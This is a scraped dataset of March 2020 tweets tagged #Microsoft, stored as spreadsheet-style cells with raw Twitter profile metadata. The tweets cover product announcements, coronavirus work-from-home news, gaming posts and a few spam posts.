    <t>{'id': 888635386880118786, 'id_str': '888635386880118786', 'name': 'Simons Martin', 'screen_name': 'SimonsMartin1', 'location': 'worldwide', 'description': '#engineer #clouds #software #IT #Technology #Cars #Robotics #IoT #Migration #DigitalInspiring', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 1009, 'listed_count': 8, 'created_at': 'Sat Jul 22 05:42:41 +0000 2017', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13086, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/888637314439630849/PY59GWiP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/888637314439630849/PY59GWiP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/888635386880118786/1500702788',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</si>
  <si>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01:23:03 +0000 2020</t>
  </si>
  <si>
    <t>Taking on the Queen | Journey to the Savage Planet #6
https://t.co/r0DbU9guHs 
#kberrygaming #youtube #pc #gaming #steamgames #steam #ea #kristikberry #epic #epicgames #TyphoonStudios #505Games #adventure #PlayStation #microsoft #ps4 #journeytothesavageplanet</t>
  </si>
  <si>
    <t>{'id': 4111803016, 'id_str': '4111803016', 'name': 'KristikðŸ“', 'screen_name': 'kristikberry', 'location': 'Erie, PA', 'description': 'Gamer, Youtuber, and Graphic Designer.ðŸ“Instagram: kristikberrigramðŸ“Facebook: Kberry Games ðŸ“Tumblr: KristikberryðŸ“YouTube: KBerry GamingðŸ“Twitch: Kristikberry', 'url': 'https://t.co/Ta6yC4s1wf', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ta6yC4s1wf', 'expanded_url': 'https://goo.gl/VvViHh', 'display_url': 'goo.gl/VvViHh', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 43, 'listed_count': 0, 'created_at': 'Wed Nov 04 11:53:27 +0000 2015', 'favourites_count': 1716, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2411,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'http://pbs.twimg.com/profile_images/1205888218874482688/6WiZyHcB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205888218874482688/6WiZyHcB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4111803016/1533829669', 'profile_link_color': '551A8B',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</si>
  <si>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01:22:03 +0000 2020</t>
  </si>
  <si>
    <t>Crisis Communication: a Power Platform template https://t.co/ppY1OPuyKY #Microsoft #PowerApps https://t.co/ZJJfVIynnK</t>
  </si>
  <si>
    <t>Thu Mar 05 01:18:36 +0000 2020</t>
  </si>
  <si>
    <t>None of other organizations can replace MS's Employees 1st approach ! #Microsoft #Respect https://t.co/SD0lwFBq53</t>
  </si>
  <si>
    <t>{'id': 147090378, 'id_str': '147090378', 'name': 'Chaitree', 'screen_name': '_Chaitree_', 'location': 'United States', 'description': 'New Media Evangelist |  #MFA - #DigitalMedia |   @Florida @LynnUniversity @USA #DigitalThinker #NewMedia Ex - #Microsoft, #EuroRSCG, #Verizon, #TCS, #Cisco ðŸ™', 'url': 'https://t.co/dkwYU4cFTD', 'entities': {'url': {'urls': [{'url': 'https://t.co/dkwYU4cFTD', 'expanded_url': 'https://in.linkedin.com/in/chaitree', 'display_url': 'in.linkedin.com/in/chaitree', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 557, 'friends_count': 2342, 'listed_count': 12, 'created_at': 'Sun May 23 05:29:28 +0000 2010', 'favourites_count': 247, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2680,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'http://pbs.twimg.com/profile_images/1157065792178937857/OVKBdfiX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157065792178937857/OVKBdfiX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/147090378/1564700958', 'profile_link_color': '6A8891',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</si>
  <si>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01:17:33 +0000 2020</t>
  </si>
  <si>
    <t>Is E3 getting canceled? 
Catch me on Twitch: Zillla_TheGod
#GodTier #coronavirus #covid19 #who #pandemic  #e3 #e32020 #destiny  #streamer #halo #mixer #montage #compilation #console #Microsoft #Xbox #SeriesX #PS5 #Gaming #clip #videogames   #abg #zillla #zilllathegod #twitch https://t.co/hoFNZAU3lV</t>
  </si>
  <si>
    <t>Thu Mar 05 01:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Do you think there is a space for both Yammer and Teams?
#Yammer #Teams #Microsoft #MSFT
https://t.co/0nnjYi6iUv</t>
  </si>
  <si>
    <t>Thu Mar 05 01:14:03 +0000 2020</t>
  </si>
  <si>
    <t>Presenting: @Matteightyate, our mentor for SSWs Angular Hack Day! He is an SSW Solution Architect, Certified #ScrumMaster and one of four #Microsoft certified #DevOps fast track partner consultants in Australia. Last call: https://t.co/4bAMOmoBbD https://t.co/DlWqM6TP3x</t>
  </si>
  <si>
    <t>{'id': 561868448, 'id_str': '561868448', 'name': 'SSW / SSW TV', 'screen_name': 'SSW_TV', 'location': 'Sydney, Australia', 'description': 'The official account for SSW, including SSW Global, SSW Consulting, SSW Rules and SSW TV. Microsoft custom software specialists. https://t.co/Il3HKDkERe', 'url': 'https://t.co/bnB1UBHG4M', 'entities': {'url': {'urls': [{'url': 'https://t.co/bnB1UBHG4M', 'expanded_url': 'http://ssw.tv', 'display_url': 'ssw.tv', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Il3HKDkERe', 'expanded_url': 'http://www.ssw.com.au', 'display_url': 'ssw.com.au', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 1275, 'friends_count': 511, 'listed_count': 52, 'created_at': 'Tue Apr 24 09:26:03 +0000 2012', 'favourites_count': 2609, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2173, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '030B0F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/536643313084809216/N_K5KUQk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/536643313084809216/N_K5KUQk_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/561868448/1580345363', 'profile_link_color': 'CC4141',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</si>
  <si>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01:14:02 +0000 2020</t>
  </si>
  <si>
    <t>Presenting: @Matteightyate, our mentor for SSWs Angular Hack Day! He is an SSW Solution Architect, Certified #ScrumMaster and one of four #Microsoft certified #DevOps fast track partner consultants in Australia. Last call: https://t.co/XSNG0Xmmzj https://t.co/3acTd2NIYu</t>
  </si>
  <si>
    <t>{'id': 724952826603032576, 'id_str': '724952826603032576', 'name': 'AngularHackDay', 'screen_name': 'AngularHackDay', 'location': '', 'description': 'AngularJS Hack Days are community run events for Angular Developers or people who want to learn AngularJS for free. There will be something for everyone.', 'url': 'https://t.co/oyLShwX8eE', 'entities': {'url': {'urls': [{'url': 'https://t.co/oyLShwX8eE', 'expanded_url': 'http://angularhackday.com/', 'display_url': 'angularhackday.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 5, 'listed_count': 3, 'created_at': 'Tue Apr 26 13:26:37 +0000 2016', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 125,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'http://pbs.twimg.com/profile_images/724953378804109312/hGpouoWM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/724953378804109312/hGpouoWM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/724952826603032576/1461677461', 'profile_link_color': 'CC4141',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</si>
  <si>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01:10:08 +0000 2020</t>
  </si>
  <si>
    <t>I'm not saying I'm surprised,  but I didn't expect to have most play time of everyone on my friends list 
#Borderlands3 #gearbox #gaymer #XboxLive #microsoft #gaygeek #MOTHAHUMPINTEAPARTY https://t.co/MByE5iCIwz</t>
  </si>
  <si>
    <t>{'id': 53286123, 'id_str': '53286123', 'name': 'Jimmy Davis', 'screen_name': 'jimjamoo', 'location': 'Vienna, W.V.', 'description': 'Alittle country and a whole lot of geek!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 283, 'listed_count': 3, 'created_at': 'Fri Jul 03 03:48:32 +0000 2009', 'favourites_count': 284, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1366,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'http://pbs.twimg.com/profile_images/1174713547558981635/y3lxKn--_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174713547558981635/y3lxKn--_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/53286123/1547771445',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</si>
  <si>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Thu Mar 05 01:10:02 +0000 2020</t>
  </si>
  <si>
    <t>Programming Using VBA - Basic
#Microsoft #MicrosoftMalaysia #MicrosoftOffice #Office #Excel #Macro #Programming #VBA #Macro #Corporate #CorporateTraining #IT #CorporateIT #CorporateITTraining #Training #Education... https://t.co/4vkPzBc3KU</t>
  </si>
  <si>
    <t>Thu Mar 05 01:09:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft : Microsft asks staff in Seattle area, Silicon Valley to work from home #Microsoft #Stock #MarketScreener https://t.co/Qh0n6WhRkt https://t.co/Zs2ctoNBG2</t>
  </si>
  <si>
    <t>{'id': 102325185, 'id_str': '102325185', 'name': 'MarketScreener.com', 'screen_name': 'Market_Screener', 'location': '', 'description': 'Find all financials news in real time. Equities, Indexes, Commodities, Currencies, Analysis, Top &amp; Flop #MarketScreener', 'url': 'https://t.co/O2QH5VgwDT', 'entities': {'url': {'urls': [{'url': 'https://t.co/O2QH5VgwDT', 'expanded_url': 'http://www.marketscreener.com', 'display_url': 'marketscreener.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9765, 'friends_count': 80, 'listed_count': 1238, 'created_at': 'Wed Jan 06 09:33:43 +0000 2010', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1888343,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'http://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102325185/1550585065', 'profile_link_color': '288842',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</si>
  <si>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Thu Mar 05 01:07:44 +0000 2020</t>
  </si>
  <si>
    <t>in bed without you so lonely... #Macomb County   #streaming #microsoft https://t.co/WybNDgZvNY</t>
  </si>
  <si>
    <t>{'id': 1235356884464480256, 'id_str': '1235356884464480256', 'name': 'Carmen Bell', 'screen_name': 'nesscojojuk', 'location': 'Las Vegas, USA', 'description': 'You are my best friend, my human diary and my other half. You mean the world to me and I LOVE YOU.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Thu Mar 05 00:10:13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'http://pbs.twimg.com/profile_images/1235368438442455041/L3r-hj4S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235368438442455041/L3r-hj4S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235356884464480256/1583369792',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</si>
  <si>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01:07:16 +0000 2020</t>
  </si>
  <si>
    <t>Tonight I will do anything to make you scream from the buzz. #Newport   #microsoft #coffee https://t.co/xHWSJELYmz</t>
  </si>
  <si>
    <t>{'id': 1235134416172785666, 'id_str': '1235134416172785666', 'name': 'Julie Leyva', 'screen_name': 'waudretcorngad', 'location': 'Anchorage, USA', 'description': 'The first time you touched me, I knew I was born to be yours.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Wed Mar 04 09:27:14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'http://pbs.twimg.com/profile_images/1235148592668696578/CnA1BFmN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235148592668696578/CnA1BFmN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235134416172785666/1583317449',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</si>
  <si>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01:03:03 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/8H3GG6yIO8</t>
  </si>
  <si>
    <t>{'id': 1111177873732231169, 'id_str': '1111177873732231169', 'name': 'Hybrid ICT', 'screen_name': 'hybridict', 'location': 'Perth, Western Australia', 'description': 'Hybrid ITC provide outsourced Business IT Support Services and onsite call-out services for Businesses, Managed IT services companies and corporate IT depts.', 'url': 'https://t.co/fFphAidD6G', 'entities': {'url': {'urls': [{'url': 'https://t.co/fFphAidD6G', 'expanded_url': 'https://www.hybridict.com.au', 'display_url': 'hybridict.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Thu Mar 28 08:07:04 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 261, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111179101807632384/hBHBs5PO_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111179101807632384/hBHBs5PO_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1111177873732231169/1553760703',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</si>
  <si>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01:00:18 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/QRDbIK3akv</t>
  </si>
  <si>
    <t>Thu Mar 05 01:00:03 +0000 2020</t>
  </si>
  <si>
    <t>For those in the #robotic process automation #RPA space, Charles Lamanna shares an update of how #Microsoft will democratize automation for all organizations with attended &amp;amp; unattended RPA. #MSDyn365 #PowerAutomate  #MSPartner https://t.co/VAce0jCyF7</t>
  </si>
  <si>
    <t>Thu Mar 05 01:00:00 +0000 2020</t>
  </si>
  <si>
    <t>$VERB #CloudMarketing #Integrations #Platforms #CloudPlatforms #DigitalMarketing #CRM #Global
#VERB is #Integrating into large #GlobalPlatforms
#Microsoft #Salesforce #NetSuite
https://t.co/lbZN8wGk6D  
https://t.co/221XMLw4ls</t>
  </si>
  <si>
    <t>{'id': 1123365547129831424, 'id_str': '1123365547129831424', 'name': 'Interactive Video Marketing', 'screen_name': 'InteractiveVid2', 'location': 'North Carolina, USA', 'description': 'In search of the best Digital Marketing, CRM, Sales &amp; Lead Generation, Research.  Marketing Analysis &amp; Investment', 'url': 'https://t.co/3ooDjBcjFc', 'entities': {'url': {'urls': [{'url': 'https://t.co/3ooDjBcjFc', 'expanded_url': 'http://InteractiveVideoMarketing.net', 'display_url': 'InteractiveVideoMarketing.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 696, 'friends_count': 680, 'listed_count': 9, 'created_at': 'Tue Apr 30 23:16:32 +0000 2019', 'favourites_count': 494, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6467, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1123550617891373056/coqohPlN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123550617891373056/coqohPlN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1123365547129831424/1556713316',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</si>
  <si>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00:59:13 +0000 2020</t>
  </si>
  <si>
    <t>How to write a Roslyn Analyzer https://t.co/suyBGxurQa #Microsoft</t>
  </si>
  <si>
    <t>{'id': 155832032, 'id_str': '155832032', 'name': 'Mathieu Perrein', 'screen_name': 'perrein', 'location': 'Luxembourg', 'description': 'Chief Technology Officer (CTO) @AinosDev - Microsoft Certified Trainer - Co-founder .NET User Group #Luxembourg #Dotnet #AI #Innovation - Views are my own.', 'url': 'https://t.co/Yy18lpv75z', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yy18lpv75z', 'expanded_url': 'http://blog.mathieu-perrein.net', 'display_url': 'blog.mathieu-perrein.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 183, 'friends_count': 171, 'listed_count': 23, 'created_at': 'Tue Jun 15 08:00:12 +0000 2010', 'favourites_count': 185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20491, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '858F94', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1098160270696988672/nj6I7915_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098160270696988672/nj6I7915_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/155832032/1478368510', 'profile_link_color': '425B8A', 'profile_sidebar_border_color': '86A4A6', 'profile_sidebar_fill_color': 'A0C5C7', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Thu Mar 05 00:59:00 +0000 2020</t>
  </si>
  <si>
    <t>ANNOUNCEMENT: Due to the mandatory working from home policy of #Microsoft to combat the #coronavirus virus, I will not be wearing pants for the entire month of March.</t>
  </si>
  <si>
    <t>{'id': 1157112574573338624, 'id_str': '1157112574573338624', 'name': 'Brandon Werner', 'screen_name': 'xerners', 'location': 'Seattle, WA', 'description': 'Building products for @microsoft for over ten years. I believe in the power of technology to enhance and improve the human experience. Back on Twitter.ðŸŒˆ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 85, 'listed_count': 0, 'created_at': 'Fri Aug 02 02:15:10 +0000 2019', 'favourites_count': 701, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 207, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1181459994438324225/mLIEAh1A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181459994438324225/mLIEAh1A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1157112574573338624/1577920720',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</si>
  <si>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00:57:55 +0000 2020</t>
  </si>
  <si>
    <t>I'm following the #Microsoft guidance to King County employees.  It was the right thing to do.   https://t.co/8AUEr14A0m</t>
  </si>
  <si>
    <t>{'id': 504741884, 'id_str': '504741884', 'name': 'Christopher Finlan', 'screen_name': 'cmfinlan', 'location': 'Views expressed are my own', 'description': 'Principal Program Manager, Power BI Report Server &amp; SQL Server Reporting Services - Microsoft #MSFTEmployee', 'url': 'https://t.co/IUo5cr5GVX', 'entities': {'url': {'urls': [{'url': 'https://t.co/IUo5cr5GVX', 'expanded_url': 'http://www.christopherfinlan.com', 'display_url': 'christopherfinlan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3029, 'friends_count': 422, 'listed_count': 141, 'created_at': 'Sun Feb 26 16:57:45 +0000 2012', 'favourites_count': 2395, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2447,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'http://pbs.twimg.com/profile_images/928036925310562304/4NwHL0EY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928036925310562304/4NwHL0EY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/504741884/1510096221',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</si>
  <si>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00:55:48 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft what do you do when you were using the authenticator app with two steps on. Then have to wipe your phone get signed out and forgot your password. You can't talk to a human. And it's telling me I have to wait 30 days. Then what? It doesn't tell you
#xbox #Microsoft</t>
  </si>
  <si>
    <t>{'id': 188198396, 'id_str': '188198396', 'name': 'Name cannot be blank', 'screen_name': 'ZombieGezus', 'location': 'pittsburgh', 'description': 'Human male', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 116, 'friends_count': 479, 'listed_count': 0, 'created_at': 'Wed Sep 08 04:11:18 +0000 2010', 'favourites_count': 1255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5088,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'http://pbs.twimg.com/profile_images/1153903766443384832/pKDe2ag7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153903766443384832/pKDe2ag7_normal.jpg',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</si>
  <si>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00:55:36 +0000 2020</t>
  </si>
  <si>
    <t>@LiviiFN Feels bad cant even play stupid Xbox glitch #microsoft support please help me</t>
  </si>
  <si>
    <t>{'id': 1142861407131787265, 'id_str': '1142861407131787265', 'name': 'SniperPro', 'screen_name': 'SniperPro_bot', 'location': '', 'description': 'Streamer 4,800 + twitch supporters', 'url': 'https://t.co/RI320GxF6v', 'entities': {'url': {'urls': [{'url': 'https://t.co/RI320GxF6v', 'expanded_url': 'http://twitch.tv/sniper_pro', 'display_url': 'twitch.tv/sniper_pro', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Sun Jun 23 18:26:07 +0000 2019', 'favourites_count': 393, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 456, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229403710301917185/nq9p40ow_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229403710301917185/nq9p40ow_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1142861407131787265/1581370109',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</si>
  <si>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00:52:19 +0000 2020</t>
  </si>
  <si>
    <t>Announcing PowerShell 7.0 https://t.co/tWMVH9D8WP #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 00:50:59 +0000 2020</t>
  </si>
  <si>
    <t>Watch how @wildandwolf went from a reactive company that put out fires to proactively anticipating and acting on the needs of their customers.    #MSDyn365 #Microsoft #Technology #IT #BusinessAutomation https://t.co/LKjEkzl5hd</t>
  </si>
  <si>
    <t>Thu Mar 05 00:49:41 +0000 2020</t>
  </si>
  <si>
    <t>New to Windows 10? Check out Simply Windows videos to get up to speed 
#Microsoft Store #Windows
https://t.co/hLzHVr4tcX</t>
  </si>
  <si>
    <t>Thu Mar 05 00:47:54 +0000 2020</t>
  </si>
  <si>
    <t>How to Install/Configure Active Directory Domain Services on Windows Server 2019 https://t.co/euZvZ7yj7k via @YouTube #Microsoft #Windows #Server #2019 #AD #ActiveDirectory #Domain #DomainServices #IT #Tech #Technology</t>
  </si>
  <si>
    <t>Thu Mar 05 00:47:06 +0000 2020</t>
  </si>
  <si>
    <t>Azure + AI Conference  Apr 2020 in Orlando, FL  Chris Pietschmann Speaking on #AzureIoT
 #AzureIoTEdge #AzureIoTHub #AzureStreamAnalytics #Azure #Microsoft #AzureFamily
https://t.co/UrmGaa2umV</t>
  </si>
  <si>
    <t>Thu Mar 05 00:44:07 +0000 2020</t>
  </si>
  <si>
    <t>Convert your pdf document to a fully editable file. For more information, click on the link https://t.co/tsWMp9R1VH
#dataentry #pdftoword #freelancer #fiverr #excel #work #convert #microsoft #word #freelance #pdftoexcel #fiverrgig #work #freelancing #vir...https://t.co/TRfv1uJYjt</t>
  </si>
  <si>
    <t>{'id': 181359802, 'id_str': '181359802', 'name': 'Jose Angel Chirinos', 'screen_name': 'JoseA_Ch', 'location': 'Cabimas - Zulia', 'description': 'Transcriptor y Animador de Logos en Fiverr', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 290, 'listed_count': 0, 'created_at': 'Sun Aug 22 00:37:10 +0000 2010', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 236,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'http://pbs.twimg.com/profile_images/1145536807133765632/pYQn7kvd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145536807133765632/pYQn7kvd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/181359802/1382368676',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</si>
  <si>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00:41:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: NDv2-Series VMs are now Generally Available https://t.co/yW1zio7asd</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: NVv4-Series VMs are now Generally Available https://t.co/7OmJ0D0p2F</t>
  </si>
  <si>
    <t>Thu Mar 05 00:38:02 +0000 2020</t>
  </si>
  <si>
    <t>I like to caress a guy for a long time so that it boils like a kettle #Arvada   #bitcoin #microsoft https://t.co/xWDqm2dDl4</t>
  </si>
  <si>
    <t>{'id': 1235355097271595008, 'id_str': '1235355097271595008', 'name': 'Carol Rodriguez', 'screen_name': 'etdejunxo', 'location': 'Aurora, USA', 'description': 'No matter how dark the moment, love and hope are always possible', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Thu Mar 05 00:03:07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'http://pbs.twimg.com/profile_images/1235361213762154497/R2Yp_CQp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235361213762154497/R2Yp_CQp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235355097271595008/1583368068',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</si>
  <si>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00:37:06 +0000 2020</t>
  </si>
  <si>
    <t>Multi-Company Consolidating Financial Reporting for Growing Businesses https://t.co/6dznaMovTa
#CarWashes #businesses #SelfStorage #BusinessOwners #FastFood #Franchise #Microsoft #PowerBI #Insights #Cloud #accounting #SMBs #Controllers #CFO #ERP #CRM #BetterTogether #CRMUG https://t.co/pfeEyuaZXw</t>
  </si>
  <si>
    <t>Thu Mar 05 00:33:11 +0000 2020</t>
  </si>
  <si>
    <t>#xbox #microsoft #customerservice #gamers #Gears5 my elite controller busted a bumper and D pad pickup out of nowhere, contacted Xbox Support and thought I'd never hear back; they responded and sent me a standard gears of war 4 controller for FREE! Awesome customer service  https://t.co/Uey2f0Fokb</t>
  </si>
  <si>
    <t>{'id': 81832239, 'id_str': '81832239', 'name': 'Jodie Prieto', 'screen_name': 'Jesus_Americana', 'location': 'Fort Belvoir, VA', 'description': 'always outmatched, never outdone... the Jesus of America', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 88, 'listed_count': 0, 'created_at': 'Mon Oct 12 12:39:21 +0000 2009', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 505,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'http://pbs.twimg.com/profile_images/898132274008477696/Ca8seeeT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/898132274008477696/Ca8seeeT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/81832239/1502966396',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</si>
  <si>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00:32:07 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft introduce free rates for corporate services for remote work #Tech https://t.co/Yw45SndDKt https://t.co/Oo0FXJCQ3m</t>
  </si>
  <si>
    <t>{'id': 4865463921, 'id_str': '4865463921', 'name': 'News Observatory', 'screen_name': 'NewsObservatory', 'location': 'Worldwide', 'description': 'News Observatory | Breaking News source | Real-time coverage of the world events, politics, markets, finance, conflict zones | @NewsObservatory', 'url': 'https://t.co/04kPtXPGUd', 'entities': {'url': {'urls': [{'url': 'https://t.co/04kPtXPGUd', 'expanded_url': 'http://newsobservatory.com', 'display_url': 'newsobservatory.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14966, 'friends_count': 888, 'listed_count': 85, 'created_at': 'Sat Jan 30 23:56:59 +0000 2016', 'favourites_count': 844, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77324,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'http://pbs.twimg.com/profile_images/1165330985996738563/o__bz8Yi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165330985996738563/o__bz8Yi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4865463921/1566671533',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</si>
  <si>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00:32:05 +0000 2020</t>
  </si>
  <si>
    <t>Groups that are actively being used in #Microsoft #Office365 will now be automatically renewed. You don't have to do a thing. @Microsoft #cdwsocial https://t.co/oKXGhlskR3</t>
  </si>
  <si>
